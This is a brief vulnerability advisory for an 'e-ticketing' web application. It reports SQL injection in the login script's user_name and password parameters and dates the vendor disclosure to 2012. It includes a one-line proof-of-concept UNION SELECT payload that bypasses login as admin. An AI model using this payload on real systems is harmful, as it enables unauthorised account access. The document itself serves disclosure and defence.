e-ticketing’ SQL Injection
A vulnerability exists in loginscript.php that allows for SQL injection of the ‘user_name’ and ‘password’ POST parameters.
II. TESTED VERSION
Released on 2011-11-30 (no versioning used)
III. PoC EXPLOIT
POST a form to loginscript.php with the value of ‘password’ set to: ‘
UNION SELECT * from user where user_name = ‘admin
Do not use this software, no patched version exists at this time.
03/01/2012 – Initial vendor disclosure
03/03/2012 – Vendor response and commitment to fix
03/20/2012 – Follow-up e-mail to vendor as no patched version was published yet
04/04/2012 – Public disclosure